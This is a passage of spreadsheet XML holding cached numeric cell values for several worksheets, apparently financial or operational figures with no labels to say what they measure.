          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>6.30</v>
          </cell>
          <cell r="S68" t="str">
            <v>5741.83</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>13.125</v>
          </cell>
          <cell r="V68">
            <v>71.2032490079365</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>277.460317460317</v>
          </cell>
          <cell r="Y68">
            <v>266.394337693732</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>6.33</v>
          </cell>
          <cell r="S69" t="str">
            <v>5487.22</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>13.1875</v>
          </cell>
          <cell r="V69">
            <v>68.0458829365079</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.3117848970252</v>
          </cell>
          <cell r="Y69">
            <v>25.3717628987586</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.00</v>
          </cell>
          <cell r="R71" t="str">
            <v>16.00</v>
          </cell>
          <cell r="S71" t="str">
            <v>4042.50</v>
          </cell>
          <cell r="T71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="U71">
            <v>33.3333333333333</v>
          </cell>
          <cell r="V71">
            <v>50.1302083333333</v>
          </cell>
          <cell r="W71">
            <v>220.25</v>
          </cell>
          <cell r="X71">
            <v>210.3125</v>
          </cell>
          <cell r="Y71">
            <v>213.487878787879</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>8.75</v>
          </cell>
          <cell r="R72" t="str">
            <v>16.75</v>
          </cell>
          <cell r="S72" t="str">
            <v>4085.25</v>
          </cell>
          <cell r="T72">
            <v>36.4583333333333</v>
          </cell>
          <cell r="U72">
            <v>34.8958333333333</v>
          </cell>
          <cell r="V72">
            <v>50.6603422619048</v>
          </cell>
          <cell r="W72">
            <v>70.6285714285714</v>
          </cell>
          <cell r="X72">
            <v>66.6865671641791</v>
          </cell>
          <cell r="Y72">
            <v>61.306407196622</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>8.75</v>
          </cell>
          <cell r="R73" t="str">
            <v>16.75</v>
          </cell>
          <cell r="S73" t="str">
            <v>4212.97</v>
          </cell>
          <cell r="T73">
            <v>36.4583333333333</v>
          </cell>
          <cell r="U73">
            <v>34.8958333333333</v>
          </cell>
          <cell r="V73">
            <v>52.2441716269841</v>
          </cell>
          <cell r="W73">
            <v>69.3714285714286</v>
          </cell>
          <cell r="X73">
            <v>66.4477611940299</v>
          </cell>
          <cell r="Y73">
            <v>62.930723456374</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="2">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>1555.8</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10850.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>0</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2997</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>54316.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3911</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>3666.18</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>60273.17</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>128.7</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8377.6</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>225.26</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17691.44</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3911</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>2786.22</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>14980.4</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>526</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>19223.73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161</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>1911.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>6.30</v>
          </cell>
          <cell r="S68" t="str">
            <v>5741.83</v>
          </cell>
          <cell r="T68">
            <v>0</v>
          </cell>
          <cell r="U68">
            <v>8.75</v>
          </cell>
          <cell r="V68">
            <v>70.9919634025717</v>
          </cell>
          <cell r="W68">
            <v>0</v>
          </cell>
          <cell r="X68">
            <v>277.460317460317</v>
          </cell>
          <cell r="Y68">
            <v>266.394337693732</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>6.33</v>
          </cell>
          <cell r="S69" t="str">
            <v>5487.22</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>8.79166666666667</v>
          </cell>
          <cell r="V69">
            <v>67.8439663699308</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.3117848970252</v>
          </cell>
          <cell r="Y69">
            <v>25.3717628987586</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>11.67</v>
          </cell>
          <cell r="R71" t="str">
            <v>27.67</v>
          </cell>
          <cell r="S71" t="str">
            <v>4054.17</v>
          </cell>
          <cell r="T71">
            <v>48.625</v>
          </cell>
          <cell r="U71">
            <v>38.4305555555556</v>
          </cell>
          <cell r="V71">
            <v>50.1257418397626</v>
          </cell>
          <cell r="W71">
            <v>230.676949443016</v>
          </cell>
          <cell r="X71">
            <v>218.901337188291</v>
          </cell>
          <cell r="Y71">
            <v>213.537357831566</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>9.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>25.75</v>
          </cell>
          <cell r="S72" t="str">
            <v>4094.25</v>
          </cell>
          <cell r="T72">
            <v>37.5</v>
          </cell>
          <cell r="U72">
            <v>35.7638888888889</v>
          </cell>
          <cell r="V72">
            <v>50.6212908011869</v>
          </cell>
          <cell r="W72">
            <v>68.3333333333333</v>
          </cell>
          <cell r="X72">
            <v>67.2621359223301</v>
          </cell>
          <cell r="Y72">
            <v>61.3218538193808</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>9.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>25.75</v>
          </cell>
          <cell r="S73" t="str">
            <v>4221.97</v>
          </cell>
          <cell r="T73">
            <v>37.5</v>
          </cell>
          <cell r="U73">
            <v>35.7638888888889</v>
          </cell>
          <cell r="V73">
            <v>52.2004203758655</v>
          </cell>
          <cell r="W73">
            <v>67.1111111111111</v>
          </cell>
          <cell r="X73">
            <v>66.6796116504854</v>
          </cell>
          <cell r="Y73">
            <v>62.9396348150271</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="3">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>169</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>10681.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>673</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2427</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>52562.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>3173</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>3876.14</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>59570.03</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>79.4399999999999</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8298.16</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>239.22</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17452.22</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3173</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3141.48</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>15011.92</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>416</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>18807.73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124</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>1787.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>3.70</v>
          </cell>
          <cell r="R68" t="str">
            <v>10.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5745.53</v>
          </cell>
          <cell r="T68">
            <v>15.4166666666667</v>
          </cell>
          <cell r="U68">
            <v>10.4166666666667</v>
          </cell>
          <cell r="V68">
            <v>70.8275394477318</v>
          </cell>
          <cell r="W68">
            <v>181.891891891892</v>
          </cell>
          <cell r="X68">
            <v>242.1</v>
          </cell>
          <cell r="Y68">
            <v>266.339919902951</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>0.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>6.33</v>
          </cell>
          <cell r="S69" t="str">
            <v>5487.22</v>
          </cell>
          <cell r="T69">
            <v>0</v>
          </cell>
          <cell r="U69">
            <v>6.59375</v>
          </cell>
          <cell r="V69">
            <v>67.6432445759369</v>
          </cell>
          <cell r="W69">
            <v>0</v>
          </cell>
          <cell r="X69">
            <v>22.3117848970252</v>
          </cell>
          <cell r="Y69">
            <v>25.3717628987586</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>8.17</v>
          </cell>
          <cell r="R71" t="str">
            <v>35.83</v>
          </cell>
          <cell r="S71" t="str">
            <v>4062.33</v>
          </cell>
          <cell r="T71">
            <v>34.0416666666667</v>
          </cell>
          <cell r="U71">
            <v>37.3229166666667</v>
          </cell>
          <cell r="V71">
            <v>50.0780325443787</v>
          </cell>
          <cell r="W71">
            <v>230.232558139535</v>
          </cell>
          <cell r="X71">
            <v>221.546190343288</v>
          </cell>
          <cell r="Y71">
            <v>213.571460221105</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>9.42</v>
          </cell>
          <cell r="R72" t="str">
            <v>35.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4103.67</v>
          </cell>
          <cell r="T72">
            <v>39.25</v>
          </cell>
          <cell r="U72">
            <v>36.6354166666667</v>
          </cell>
          <cell r="V72">
            <v>50.5876479289941</v>
          </cell>
          <cell r="W72">
            <v>66.8789808917197</v>
          </cell>
          <cell r="X72">
            <v>67.1595109468297</v>
          </cell>
          <cell r="Y72">
            <v>61.3346102391274</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>9.42</v>
          </cell>
          <cell r="R73" t="str">
            <v>35.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4231.38</v>
          </cell>
          <cell r="T73">
            <v>39.25</v>
          </cell>
          <cell r="U73">
            <v>36.6354166666667</v>
          </cell>
          <cell r="V73">
            <v>52.1619822485207</v>
          </cell>
          <cell r="W73">
            <v>70.276008492569</v>
          </cell>
          <cell r="X73">
            <v>67.6428774523742</v>
          </cell>
          <cell r="Y73">
            <v>62.9561159716215</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="4">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>781</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>9900.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6004</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>3916</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>54650.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>5074</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5417.89</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>59226.14</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>260.74</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>8037.42</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>502</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>279.36</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>17674.86</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>4572</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4322.79</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>15261.13</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>555</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>18252.73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197</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>1590.457</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>34.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5769.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>28.3333333333333</v>
          </cell>
          <cell r="V68">
            <v>70.9135939036381</v>
          </cell>
          <cell r="W68">
            <v>250.166666666667</v>
          </cell>
          <cell r="X68">
            <v>247.794117647059</v>
          </cell>
          <cell r="Y68">
            <v>266.272642658934</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>17.98</v>
          </cell>
          <cell r="R69" t="str">
            <v>24.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5505.20</v>
          </cell>
          <cell r="T69">
            <v>74.9166666666667</v>
          </cell>
          <cell r="U69">
            <v>20.2666666666667</v>
          </cell>
          <cell r="V69">
            <v>67.6647000983284</v>
          </cell>
          <cell r="W69">
            <v>21.1204979991107</v>
          </cell>
          <cell r="X69">
            <v>21.4538904899135</v>
          </cell>
          <cell r="Y69">
            <v>25.3588086208228</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>13.42</v>
          </cell>
          <cell r="R71" t="str">
            <v>49.25</v>
          </cell>
          <cell r="S71" t="str">
            <v>4075.75</v>
          </cell>
          <cell r="T71">
            <v>55.9166666666667</v>
          </cell>
          <cell r="U71">
            <v>41.0416666666667</v>
          </cell>
          <cell r="V71">
            <v>50.095255653884</v>
          </cell>
          <cell r="W71">
            <v>207.004470938897</v>
          </cell>
          <cell r="X71">
            <v>217.583756345178</v>
          </cell>
          <cell r="Y71">
            <v>213.549837453229</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>18.00</v>
          </cell>
          <cell r="R72" t="str">
            <v>53.17</v>
          </cell>
          <cell r="S72" t="str">
            <v>4121.67</v>
          </cell>
          <cell r="T72">
            <v>75</v>
          </cell>
          <cell r="U72">
            <v>44.3083333333333</v>
          </cell>
          <cell r="V72">
            <v>50.6596607669617</v>
          </cell>
          <cell r="W72">
            <v>63.7777777777778</v>
          </cell>
          <cell r="X72">
            <v>66.0146699266504</v>
          </cell>
          <cell r="Y72">
            <v>61.3452799472059</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>18.00</v>
          </cell>
          <cell r="R73" t="str">
            <v>53.17</v>
          </cell>
          <cell r="S73" t="str">
            <v>4249.38</v>
          </cell>
          <cell r="T73">
            <v>75</v>
          </cell>
          <cell r="U73">
            <v>44.3083333333333</v>
          </cell>
          <cell r="V73">
            <v>52.2293510324484</v>
          </cell>
          <cell r="W73">
            <v>63.7777777777778</v>
          </cell>
          <cell r="X73">
            <v>66.3343990972353</v>
          </cell>
          <cell r="Y73">
            <v>62.9595964587775</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="5">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>812</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>9088.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6319</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>3639</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>57330.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>5097</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5719.43</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>58603.71</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>387.06</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7650.36</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>1508</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>517.02</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18665.84</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>3589</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3990.85</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>14859.28</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>824.5</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>17428.23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1368.84</v>
          </cell>
        </row>
        <row r="29">
          <cell r="V29">
            <v>205</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>2754.297</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>58.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5793.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>40.2777777777778</v>
          </cell>
          <cell r="V68">
            <v>70.9991421568627</v>
          </cell>
          <cell r="W68">
            <v>263.291666666667</v>
          </cell>
          <cell r="X68">
            <v>254.206896551724</v>
          </cell>
          <cell r="Y68">
            <v>266.260293810509</v>
          </cell>
        </row>
        <row r="69">
          <cell r="Q69" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R69" t="str">
            <v>48.32</v>
          </cell>
          <cell r="S69" t="str">
            <v>5529.20</v>
          </cell>
          <cell r="T69">
            <v>100</v>
          </cell>
          <cell r="U69">
            <v>33.5555555555556</v>
          </cell>
          <cell r="V69">
            <v>67.7598039215686</v>
          </cell>
          <cell r="W69">
            <v>22.9992087355594</v>
          </cell>
          <cell r="X69">
            <v>22.2310385992837</v>
          </cell>
          <cell r="Y69">
            <v>25.3487507244063</v>
          </cell>
        </row>
        <row r="71">
          <cell r="Q71" t="str">
            <v>14.08</v>
          </cell>
          <cell r="R71" t="str">
            <v>63.33</v>
          </cell>
          <cell r="S71" t="str">
            <v>4089.83</v>
          </cell>
          <cell r="T71">
            <v>58.6666666666667</v>
          </cell>
          <cell r="U71">
            <v>43.9791666666667</v>
          </cell>
          <cell r="V71">
            <v>50.1204656862745</v>
          </cell>
          <cell r="W71">
            <v>237.926136363636</v>
          </cell>
          <cell r="X71">
            <v>222.106426654034</v>
          </cell>
          <cell r="Y71">
            <v>213.633757393339</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72" t="str">
            <v>13.83</v>
          </cell>
          <cell r="R72" t="str">
            <v>67.00</v>
          </cell>
          <cell r="S72" t="str">
            <v>4135.50</v>
          </cell>
          <cell r="T72">
            <v>57.625</v>
          </cell>
          <cell r="U72">
            <v>46.5277777777778</v>
          </cell>
          <cell r="V72">
            <v>50.6801470588235</v>
          </cell>
          <cell r="W72">
            <v>66.0882140274765</v>
          </cell>
          <cell r="X72">
            <v>66.0298507462687</v>
          </cell>
          <cell r="Y72">
            <v>61.3611413372023</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73" t="str">
            <v>13.83</v>
          </cell>
          <cell r="R73" t="str">
            <v>67.00</v>
          </cell>
          <cell r="S73" t="str">
            <v>4263.22</v>
          </cell>
          <cell r="T73">
            <v>57.625</v>
          </cell>
          <cell r="U73">
            <v>46.5277777777778</v>
          </cell>
          <cell r="V73">
            <v>52.2453431372549</v>
          </cell>
          <cell r="W73">
            <v>60.2313810556761</v>
          </cell>
          <cell r="X73">
            <v>65.0746268656716</v>
          </cell>
          <cell r="Y73">
            <v>62.950598373999</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="6">
        <row r="7">
          <cell r="P7">
            <v>0</v>
          </cell>
          <cell r="Q7">
            <v>0.621</v>
          </cell>
          <cell r="R7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="V7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0.621</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>14000</v>
          </cell>
          <cell r="Q8">
            <v>8478.836</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>873</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>8215.736</v>
          </cell>
        </row>
        <row r="13">
          <cell r="D13">
            <v>60437.506</v>
          </cell>
          <cell r="E13">
            <v>6348</v>
          </cell>
        </row>
        <row r="13">
          <cell r="I13">
            <v>2336</v>
          </cell>
        </row>
        <row r="13">
          <cell r="L13">
            <v>61342.616</v>
          </cell>
        </row>
        <row r="14">
          <cell r="E14">
            <v>0</v>
          </cell>
        </row>
        <row r="14">
          <cell r="I14">
            <v>0</v>
          </cell>
        </row>
        <row r="16">
          <cell r="D16">
            <v>65429.37</v>
          </cell>
          <cell r="E16">
            <v>2904</v>
          </cell>
        </row>
        <row r="16">
          <cell r="I16">
            <v>5917.59</v>
          </cell>
        </row>
        <row r="16">
          <cell r="L16">
            <v>55590.12</v>
          </cell>
        </row>
        <row r="17">
          <cell r="D17">
            <v>9068.94</v>
          </cell>
          <cell r="E17">
            <v>0</v>
          </cell>
        </row>
        <row r="17">
          <cell r="I17">
            <v>458.58</v>
          </cell>
        </row>
        <row r="17">
          <cell r="L17">
            <v>7191.78</v>
          </cell>
        </row>
        <row r="18">
          <cell r="D18">
            <v>17406.9</v>
          </cell>
          <cell r="E18">
            <v>0</v>
          </cell>
        </row>
        <row r="18">
          <cell r="I18">
            <v>285.44</v>
          </cell>
        </row>
        <row r="18">
          <cell r="L18">
            <v>18380.4</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>17829.8</v>
          </cell>
          <cell r="E19">
            <v>2904</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4652.57</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>13110.71</v>
          </cell>
        </row>
        <row r="20">
          <cell r="D20">
            <v>21123.73</v>
          </cell>
          <cell r="E20">
            <v>0</v>
          </cell>
        </row>
        <row r="20">
          <cell r="I20">
            <v>521</v>
          </cell>
        </row>
        <row r="20">
          <cell r="L20">
            <v>16907.23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119</v>
          </cell>
        </row>
        <row r="29">
          <cell r="Y29">
            <v>2635.297</v>
          </cell>
        </row>
        <row r="50">
          <cell r="E50">
            <v>0</v>
          </cell>
        </row>
        <row r="50">
          <cell r="I50">
            <v>0</v>
          </cell>
        </row>
        <row r="64">
          <cell r="I64">
            <v>0</v>
          </cell>
        </row>
        <row r="68">
          <cell r="Q68" t="str">
            <v>24.00</v>
          </cell>
          <cell r="R68" t="str">
            <v>82.00</v>
          </cell>
          <cell r="S68" t="str">
            <v>5817.53</v>
          </cell>
          <cell r="T68">
            <v>100</v>
          </cell>
          <cell r="U68">
            <v>48.8095238095238</v>
          </cell>
          <cell r="V68">
            <v>71.0841886608016</v>
          </cell>
          <cell r="W68">
            <v>264.5</v>
          </cell>
          <cell r="X68">
            <v>257.219512195122</v>
          </cell>
          <cell r="Y68">
            <v>266.253031784967</v>
          </cell>
        </row>
        <row r="69">
